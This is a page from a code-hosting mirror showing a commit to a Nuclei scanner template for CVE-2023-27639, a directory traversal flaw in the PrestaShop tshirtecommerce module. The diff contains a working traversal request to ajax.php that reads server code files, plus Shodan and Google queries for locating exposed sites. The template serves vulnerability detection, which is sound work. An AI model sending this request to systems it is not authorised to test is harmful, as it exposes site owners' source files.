daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated req,matcher & metadata

patch-1
Ritik Chaddha 2024-01-20 02:35:28 +05:30 committed by GitHub
parent e7ed4d1cb0
commit 71f681c9a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
http/cves/2023/CVE-2023-27639.yaml
View File

@ -1,32 +1,43 @@
id: CVE-2023-27639
info:
name: PrestaShop tshirtecommerce Directory Traversal
name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO
severity: high
description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files."
The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cve-id: CVE-2023-27639
metadata:
max-request: 1
product: tshirtecommerce
verified: true
framework: prestashop
shodan-query: http.component:"prestashop"
tags: cve,cve2023,prestashop,lfi
product: tshirtecommerce
google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
http:
- method: POST
path:
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg"
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php"
headers:
Content-Type: application/x-www-form-urlencoded
- raw:
- |
POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
matchers-condition: and
matchers:
- type: word
words:
- "SqlFormatter Examples"
- type: word
words:
- "?php"
- "SqlFormatter"
- "<?php"
condition: and
- type: status
status:
- 200